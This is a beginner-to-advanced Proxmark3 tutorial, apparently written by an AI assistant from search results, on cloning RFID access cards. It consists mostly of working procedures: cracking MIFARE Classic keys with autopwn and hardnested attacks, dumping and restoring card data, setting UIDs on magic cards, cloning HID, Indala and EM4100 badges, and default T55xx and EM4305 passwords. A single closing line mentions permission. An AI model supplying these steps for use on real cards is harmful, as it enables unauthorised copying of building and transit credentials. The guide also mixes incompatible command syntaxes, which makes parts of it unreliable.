Complete Proxmark3 Card Cloning Tutorial — From Beginner to Advanced
Based on the search results, I can provide you with a comprehensive, detailed guide to card cloning using the Proxmark3 device. This tutorial covers everything from basic setup to advanced techniques, using both GUI and command-line methods.
Part 1: What is Proxmark3 and What Can It Do?
Proxmark3 is an open-source hardware device designed for RFID (Radio Frequency Identification) research, security testing, and card cloning. It can read, write, clone, and analyze various types of RFID and NFC cards.
What Cards Can You Clone?
| Frequency | Card Types | Common Uses | Clone Difficulty |
|---|
| Low Frequency (125 kHz) | EM4100, HID Prox, Indala, T55xx | Building access, parking gates, old door systems | Easy |
| High Frequency (13.56 MHz) | MIFARE Classic (1K/4K), MIFARE Ultralight, NFC tags | Modern access control, transit cards, student IDs | Medium-Hard |
| iClass | HID iClass, iClass SE | Corporate access, high-security facilities | Hard (requires keys) |
What You'll Need
| Item | Purpose | Where to Get |
|---|
| Proxmark3 device | The hardware reader/writer | Online (AliExpress, eBay, specialized RFID shops) |
| Blank cards | To write cloned data to | Same sources |
| Computer | To run Proxmark3 software | Your own PC |
| USB cable | Connect Proxmark3 to computer | Included with device |
Part 2: Setting Up Your Proxmark3
2.1 Hardware Setup
- Connect your Proxmark3 to your computer via USB cable
- The device should light up (LED indicators may blink)
- You may need to install drivers (see below)
2.2 Software Setup — Three Methods
Method 1: GUI Software (Easiest for Beginners)
The Proxmark3 Easy Gui_X is a graphical interface that makes card cloning accessible to beginners.
| Step | Action |
|---|
| 1 | Download Proxmark3 Easy Gui_X (or newer version called "AiSi Assistant" |
| 2 | Extract the downloaded archive (e.g., Vx x x-win64-xxxxxxx.7z) |
| 3 | Navigate to Vx x x-win64-xxxxxxx\GUI\ |
| 4 | Run Proxmark3GUI.exe |
| 5 | If prompted, enter your order number/registration |
| 6 | Select the correct COM port for your device |
Method 2: Command Line on Windows (ProxSpace)
This is the recommended approach for the Iceman fork (the most actively developed version).
| Step | Action |
|---|
| 1 | Download ProxSpace from the GitHub repository |
| 2 | Extract to a folder (avoid spaces in path names) |
| 3 | Run runme64.bat (for 64-bit Windows) |
| 4 | In the ProxSpace terminal, type ./pm3 to launch the client |
| 5 | If device not found, check Device Manager for correct COM port |
Method 3: Linux / macOS (Kali Linux Recommended)
For the most stable experience, Kali Linux is recommended.
| Step | Command/Action |
|---|
| 1 | Install prerequisites: sudo apt-get install git build-essential libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi |
| 2 | Clone repository: git clone https://github.com/Proxmark/proxmark3.git |
| 3 | Enter directory: cd proxmark3 |
| 4 | Compile: make clean && make all |
| 5 | Flash bootrom: ./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf |
| 6 | Flash full image: ./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf |
| 7 | Run client: ./client/proxmark3 /dev/ttyACM0 |
2.3 Verify Your Setup
Once connected, test your device:
| Command | What It Does |
|---|
| hw tune | Measures antenna characteristics (voltage should be 20-45+ V) |
| hw version | Shows firmware version |
| hf search | Scans for high-frequency tags |
| lf search | Scans for low-frequency tags |
Part 3: Complete Cloning Tutorials
Tutorial 1: Cloning MIFARE Classic Cards (High Frequency) — GUI Method
This is the most common cloning scenario for access cards.
What You Need:
- Original MIFARE Classic card (your "mother" card)
- Blank UID-writable card (also called "magic card" or Gen1A)
- Proxmark3 device connected to GUI software
Step-by-Step Process:
| Step | Action | Explanation |
|---|
| 1 | Place the original card on the Proxmark3 antenna | Card must be positioned correctly for reading |
| 2 | In the GUI, click "Read Card Type" | Identifies what kind of card you have |
| 3 | Wait for successful read confirmation | The software will display card information |
| 4 | Click "One-Click Parse" | This attempts to crack all encryption keys automatically |
| 5 | Wait for the cracking process to complete | May take 30 seconds to several minutes depending on card security |
| 6 | Click "OK" on the dialog box | Confirms keys have been found |
| 7 | Click "Read Original Card Data" | Dumps all sectors of the original card |
| 8 | Remove the original card | — |
| 9 | Place a blank UID card on the antenna | This is your target card to write to |
| 10 | Click "Write to UID Card" | Writes the dumped data to the blank card |
| 11 | Wait for completion message | Your clone is now ready |
Tutorial 2: Cloning MIFARE Classic — Command Line Method
For those who prefer more control and understanding of what's happening.
Step 1: Identify the Card
| Command | What It Does |
|---|
| hf search | Automatically detects and identifies high-frequency tags |
| hf 14a reader | Reads ISO14443-A card information |
Step 2: Crack Keys Using autopwn (Recommended Method)
The easiest way to crack keys is using the built-in autopwn command:
| Command | Explanation |
|---|
| hf mf autopwn -f mfc_default_keys | Automatically attacks the card using default key dictionary |
This command will:
- Load the default key dictionary (1,819+ keys)
- Try strategies to find valid keys for each sector
- If default keys don't work, fall back to hardnested attack
Step 3: Alternative Key Cracking Methods
If autopwn doesn't work, try these approaches:
| Command | Use Case |
|---|
| hf mf chk *1 ? d default_keys.dic | Check all sectors against default key dictionary |
| hf mf hardnested 0 A 8829da9daf76 4 A w | Run hardnested attack on specific sector (for difficult cards) |
Step 4: Dump the Card Data
Once keys are found:
| Command | Explanation |
|---|
| hf mf dump 1 | Dumps the entire 1K card to a binary file (default: dumpdata.bin) |
Step 5: Convert Dump Format (Optional)
To simulate the card later:
| Command | Explanation |
|---|
| script run dumptoemul -i dumpdata.bin | Converts .bin file to .eml format for simulation |
Step 6: Load Dump into Memory and Simulate
| Command | Explanation |
|---|
| hf mf eload 353C2AA6 | Loads dump into emulator memory (use your actual filename) |
| hf mf sim u 353c2aa6 | Simulates the card with specified UID |
Step 7: Write to Blank Card
| Command | Explanation |
|---|
| hf mf restore 1 | Restores the dumped data to a blank card |
Or manually write specific blocks:
| Command | Explanation |
|---|
| hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016 | Writes block 0 (UID block) with specific data |
Tutorial 3: Setting UID on Magic Cards (Gen1A)
For 4-byte UID cards (Gen1A "magic cards"):
| Command | Explanation |
|---|
| hf mf csetuid -u 11223344 | Sets UID to 11223344 (replace with your target UID) |
| hf mf cwipe | Wipes the card (fills with 0xFF) |
Note: Some magic cards have different behaviors:
| Flavor | Characteristics |
|---|
| Flavor 1 | Plays SAK from block0; static PRNG; wipe fills with 0xFF |
| Flavor 2 | Plays SAK from block0; static PRNG; wipe fills with 0x00 |
| Flavor 3 | SAK fixed to 08; static PRNG; wipe fills with 0xFF |
| Flavor 4 | SAK fixed to 08; weak PRNG; wipe times out |
Tutorial 4: Cloning Low-Frequency Cards (125 kHz)
For HID Prox, EM4100, and T55xx cards.
Step 1: Read the Card
| Command | Explanation |
|---|
| lf search | Automatically detects and identifies low-frequency tags |
| lf hid read | Specifically reads HID Prox cards |
| lf indala read | Specifically reads Indala cards |
| lf em 410x reader | Reads EM4100 cards |
Step 2: Simulate the Card (Test Before Cloning)
| Command | Explanation |
|---|
| lf hid sim 200670012d | Simulates HID card with specified ID |
| lf indala sim a0000000c2c436c1 | Simulates Indala card |
Step 3: Clone to T55xx Blank Card
| Command | Explanation |
|---|
| lf hid clone 200670012d | Clones HID card to T55xx |
| lf indala clone a0000000c2c436c1 | Clones Indala card to T55xx |
| lf em 410x clone --id 1122334455 | Clones EM4100 card |
Step 4: Verify the Clone
| Command | Explanation |
|---|
| lf search | Should read back the cloned ID |
Part 4: Understanding Magic Cards (Blank Cards)
"Magic cards" are special blank cards that allow you to write UIDs and other data normally locked on legitimate cards.
Types of Magic Cards for High Frequency (13.56 MHz)
| Card Type | UID Length | Writable UID? | ATQA/SAK Control | Best For |
|---|
| Gen1A (UID) | 4 bytes | Yes (with special commands) | Limited | Most common cloning scenarios |
| UID (CUID) | 4 bytes | Yes | Yes | General cloning |
| FUID | 4 or 7 bytes | Write-once (permanent) | Yes | Permanent clones |
| UFUID | 4 or 7 bytes | Lockable | Yes | Advanced use |
| Gen2 (7-byte UID) | 7 bytes | Yes | Yes | Cards with 7-byte UIDs |
Identifying Your Magic Card
| Command | What to Look For |
|---|
| hf mf info | Shows "Magic capabilities... Gen 1a" for Gen1A cards |
| hf 14a reader | Shows UID length (4 or 7 bytes) |
Types of Magic Cards for Low Frequency (125 kHz)
| Chip Type | Common Name | Password | Lockable |
|---|
| T55xx | T55x7, 5577 | Optional (default: 19920427) | Yes |
| EM4305 | EM4x05 | Optional (default: 84AC15E2) | Yes |
| ID82xx | H5, H7, ID8210 | Varies | Varies |
Part 5: Troubleshooting Common Issues
Problem 1: "Auth1 error" during hardnested attack
| Symptom | Possible Cause | Solution |
|---|
| Multiple "Auth1 error" messages | Card has hardended PRNG or is not a genuine MIFARE Classic EV1 | Try different attack strategy or sniff reader-card communication |
Forum expert advice: "EV1 cards with hard protected random number generators can be difficult or possibly impossible to crack... your next best bet might be to try to use your proxmark3 to sniff the conversation between reader and card".
Problem 2: Card not detected after writing UID
| Symptom | Possible Cause | Solution |
|---|
| "Card doesn't support standard iso14443-3 anticollision" | Incorrect ATQA/SAK configuration | Use hf mf csetuid with proper ATQA parameters |
Example:
Code:
hf mf csetuid -u 0366E6323FXXXX --atqa 0088
Problem 3: Can't restore to original after failed write
| Solution | Command |
|---|
| Wipe the card | hf mf cwipe |
Problem 4: 7-byte UID on 4-byte card
| Issue | Explanation |
|---|
| Some cards have 7-byte UIDs but magic cards only support 4-byte | May not work. Forum user reported: "I believed as long as block0 is writable you should be able to write different length UIDs" |
Part 6: Complete Cheatsheet of Essential Commands
General Commands
| Command | Description |
|---|
| help | Show all commands |
| hw tune | Test antenna tuning (should be 20-45+ V) |
| hw version | Show firmware version |
| hf search | Auto-detect high-frequency tags |
| lf search | Auto-detect low-frequency tags |
| data plot | Display graphical signal data |
High-Frequency (13.56 MHz) Commands
| Command | Description |
|---|
| hf 14a reader | Read ISO14443-A card info |
| hf 14a info | Detailed tag information |
| hf mf chk *1 ? d default_keys.dic | Check default keys on all sectors |
| hf mf autopwn -f mfc_default_keys | Auto-crack using dictionary |
| hf mf hardnested 0 A 8829da9daf76 4 A w | Hardnested attack on sector 4 |
| hf mf dump 1 | Dump 1K card to file |
| hf mf restore 1 | Restore dump to blank card |
| hf mf eload <filename> | Load dump into emulator memory |
| hf mf sim u <UID> | Simulate card with specified UID |
| hf mf csetuid -u <UID> | Set UID on Gen1A magic card |
| hf mf cwipe | Wipe Gen1A magic card |
| hf mf wrbl <block> A <key> <data> | Write specific block |
Low-Frequency (125 kHz) Commands
| Command | Description |
|---|
| lf hid read | Read HID Prox card |
| lf hid sim <ID> | Simulate HID card |
| lf hid clone <ID> | Clone HID to T55xx |
| lf indala read | Read Indala card |
| lf indala sim <UID> | Simulate Indala card |
| lf indala clone <UID> | Clone Indala to T55xx |
| lf em 410x reader | Read EM4100 card |
| lf em 410x sim --id <ID> | Simulate EM4100 card |
| lf t55xx detect | Detect T55xx chip |
| lf t55xx dump | Dump T55xx memory |
Part 7: Important Notes and Limitations
What You CAN Clone
| Card Type | Feasibility | Notes |
|---|
| MIFARE Classic (1K/4K) | Yes (with key cracking) | Most common; vulnerable to hardnested attack |
| MIFARE Ultralight | Yes | No encryption; trivial to clone |
| EM4100 | Yes | No encryption; very easy |
| HID Prox | Yes | No encryption; easy |
| T55xx | Yes | Configurable; medium difficulty |
| Indala | Yes | PSK modulation; medium difficulty |
What You CANNOT Clone (or Very Difficult)
| Card Type | Reason |
|---|
| MIFARE DESFire EV2/EV3 | Strong AES-128 encryption; no known public attacks |
| iClass SE | Strong encryption; requires Elite keys |
| Ultra-secure government cards | Multiple layers of security |
| Credit/Debit cards with EMV chips | Dynamic cryptograms; cannot be cloned |
Summary
This tutorial covers everything from basic setup to advanced cloning techniques. The key takeaways:
- Start with GUI software if you're a complete beginner — it handles the complex commands automatically
- Use the Iceman firmware for the most features and active development
- Buy proper blank cards — Gen1A (UID-writable) for MIFARE Classic, T55xx for low-frequency
- Test your clones before relying on them
- Some cards cannot be cloned — modern secure cards like DESFire EV3 are not vulnerable
The Proxmark3 is a powerful tool for RFID research and security testing. Always ensure you have permission to test and clone any cards you work with.
